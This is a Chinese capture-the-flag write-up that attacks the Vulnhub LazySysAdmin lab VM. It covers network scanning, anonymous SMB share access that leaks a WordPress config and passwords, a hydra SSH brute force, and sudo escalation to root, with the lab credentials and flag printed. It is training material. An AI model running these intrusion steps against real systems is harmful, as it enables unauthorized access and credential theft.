Vulnhub-Lazysysadmin渗透靶场
目标发现
由于是在同一网络下的靶机,那么可以使用arp-scan进行扫描发现目标:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo arp-scan 192.168.56.0/24
[sudo] kali 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 VMware, Inc.
192.168.56.2 00:50:56:fa:da:39 VMware, Inc.
192.168.56.135 00:0c:29:fa:ac:4b VMware, Inc.
192.168.56.254 00:50:56:ea:d8:46 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.963 seconds (130.41 hosts/sec). 4 responded
从扫描结果来看目标应该是192.168.56.135,下面就需要进行资产搜集,查找开放的端口以及相关服务识别。
信息搜集
开放端口信息
开放端口识别:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo nmap -sS -p- 192.168.56.135 --min-rate=10000 -oA ./nmap_result/open_ort_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-03 10:34 EDT
Nmap scan report for 192.168.56.135
Host is up (0.0026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:FA:AC:4B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
开放端口服务详情识别:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat nmap_result/open_ort_scan.nmap | grep /tcp | awk -F/ '{print $1}' | tr '\n' ','
22,80,139,445,3306,6667,
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo nmap -sS -sV -p22,80,139,445,3306,6667,2 -A 192.168.56.135 --min-rate=10000 -oA nmap_result/nmap_portserver
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-03 10:54 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.56.128
|_ error: Closing link: (nmap@192.168.56.128) [Client exited]
MAC Address: 00:0C:29:FA:AC:4B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2026-05-04T00:55:09+10:00
|_clock-skew: mean: -3h20m00s, deviation: 5h46m23s, median: -1s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2026-05-03T14:55:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.56.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.81 seconds
经过整理可以得到一下信息:
| 端口 | 协议 | 服务 | 版本 / 详情 | 风险关注点 | 状态 |
|---|---|---|---|---|---|
| 22 | SSH | OpenSSH 6.6.1p1 | Ubuntu 2ubuntu2.8,支持 DSA / RSA / ECDSA / ED25519 | 旧版本 弱算法 (DSA-1024) | open |
| 80 | HTTP | Apache httpd 2.4.7 | Silex v2.2.7;robots.txt 暴露 /old/ /test/ /TR2/ /Backnode_files/ | 高 robots.txt 信息泄露,旧版 Apache | open |
| 139 | NetBIOS | Samba smbd 3.X–4.X | 工作组 WORKGROUP | 中 配合 445 进行 SMB 利用 | open |
| 445 | SMB | Samba 4.3.11-Ubuntu | Guest 账户可用;签名未强制;工作组 WORKGROUP | 高 匿名访问,签名禁用,枚举共享 | open |
| 3306 | MySQL | MySQL | 状态 unauthorized(无授权直连) | 高 暴露在外网,弱口令爆破 | open |
| 6667 | IRC | InspIRCd | 服务器 Admin.local;当前 1 用户在线 | 低 信息泄露,横向利用可能 | open |
SMB 附加信息:
| 字段 | 值 |
|---|---|
| OS (SMB) | Windows 6.1 / Samba 4.3.11-Ubuntu |
| 计算机名 | lazysysadmin |
| NetBIOS 名 | LAZYSYSADMIN |
| 域名 | (空) |
| 消息签名 | 已禁用(危险,可中间人) |
| Guest 账户 | 已启用 |
| 认证级别 | user(支持 challenge/response |
根据扫描结果,攻击面优先级如下:
-
优先打 SMB(445):Guest 账户开放 + 签名禁用,可以先尝试使用
smbclient -L //192.168.56.135 -N枚举共享,看有没有可写目录或敏感文件。 -
同时关注 Web(80):robots.txt 中已经列出了几个隐藏目录,
/old/、/test/这类很可能有遗留文件,值得 dirsearch 跑一遍。 -
MySQL(3306) 外露比较罕见,直接尝试
mysql -h 192.168.56.135 -u root无密码登录,或者等 Web 渗透拿到 WordPress 之类的配置文件后再来复用凭据。 -
SSH(22) 保留,暂不考虑作为入口,在得到凭据和一些用户名后可以尝试密码喷洒。
SMB(445)
尝试使用smbclient枚举:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ smbclient -L //192.168.56.135 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ smbclient //192.168.56.135/share$ -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Tue Aug 15 07:21:08 2017
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
3029776 blocks of size 1024. 1456464 blocks available
smb: \> cd wordpress\
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (11.5 KiloBytes/sec) (average 11.5 KiloBytes/sec)
smb: \wordpress\> ls
. D 0 Tue Aug 15 07:21:08 2017
.. D 0 Tue Aug 15 07:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 04:58:26 2015
wp-trackback.php N 4513 Fri Oct 14 15:39:28 2016
wp-admin D 0 Wed Aug 2 17:02:02 2017
wp-settings.php N 16200 Thu Apr 6 14:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 06:20:28 2015
index.php N 418 Tue Sep 24 20:18:11 2013
wp-cron.php N 3286 Sun May 24 13:26:25 2015
wp-links-opml.php N 2422 Sun Nov 20 21:46:30 2016
readme.html N 7413 Mon Dec 12 03:01:39 2016
wp-signup.php N 29924 Tue Jan 24 06:08:42 2017
wp-content D 0 Mon Aug 21 06:07:27 2017
license.txt N 19935 Mon Jan 2 12:58:42 2017
wp-mail.php N 8048 Wed Jan 11 00:13:43 2017
wp-activate.php N 5447 Tue Sep 27 17:36:28 2016
.htaccess H 35 Tue Aug 15 07:40:13 2017
xmlrpc.php N 3065 Wed Aug 31 12:31:29 2016
wp-login.php N 34327 Fri May 12 13:12:46 2017
wp-load.php N 3301 Mon Oct 24 23:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 08:00:32 2016
wp-config.php N 3703 Mon Aug 21 05:25:14 2017
wp-includes D 0 Wed Aug 2 17:02:03 2017
3029776 blocks of size 1024. 1456464 blocks available
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (0.4 KiloBytes/sec) (average 6.1 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (25.7 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> get robots.txt
getting file \robots.txt of size 92 as robots.txt (44.9 KiloBytes/sec) (average 6.3 KiloBytes/sec)
看起来共享确实是可以通过 Guest 访问的,而且里面东西还不少,将他们下载后查看,发现有大量敏感信息:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ ls
deets.txt robots.txt todolist.txt wp-config.php
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');
;
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
PS:需要注意的是 "deets" 是英语俚语,是 "details" 的缩写,在口语里专门用来指"八卦细节"或"账号信息"。比如:
"Spill the deets!" = "快说说细节!"
因此可以看到文件中确实存在了一些重要信息。
从这些文件中得到了大量有效信息:
- 服务器账密:Password:12345
- 数据库账密:Admin:TogieMYSQL12345^^
- 人名:Togie(来自wp-config的注释中:
/* Dynamic site URL added by Togie */) - robot.txt中的目录
那么可以将这些保存,用于尝试ssh登录、网站后台登录、密码喷洒等:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat >> name.txt << EOF
heredoc> admin
heredoc> Admin
heredoc> Password
heredoc> Togie
heredoc> togie
heredoc> EOF
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat >> passwd.txt << EOF
heredoc> TogieMYSQL12345^^
heredoc> 12345
heredoc> EOF
ssh(22)
使用刚才得到的凭据信息进行登录尝试:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ hydra -L name.txt -P pass.txt 192.168.56.135 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-03 11:30:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:5/p:2), ~1 try per task
[DATA] attacking ssh://192.168.56.135:22/
[22][ssh] host: 192.168.56.135 login: togie password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-03 11:30:40
通过密码喷洒得到一个ssh的账户togie,那么就可以尝试登入系统,看看权限:
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User togie may run the following commands on LazySysAdmin:
(ALL : ALL) ALL
togie@LazySysAdmin:~$
可以看到拥有sudo全部权限,直接使用sudo提权
提权&读取flag
使用sudo提权至root并读取flag:
togie@LazySysAdmin:~$ sudo -i
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
总结
- 在nmap扫描结果中看到SMB服务开启,且 Guest 账户可用 + 签名禁用 两个因素同时出现,那么就说明应该首先尝试smb服务。
- 在信息搜集的时候像一些待办、记录等明显运维人员记录的内容都应该仔细查看,任何疑似人名的都应该记录下来,为后续的攻击做好准备。
浙公网安备 33010602011771号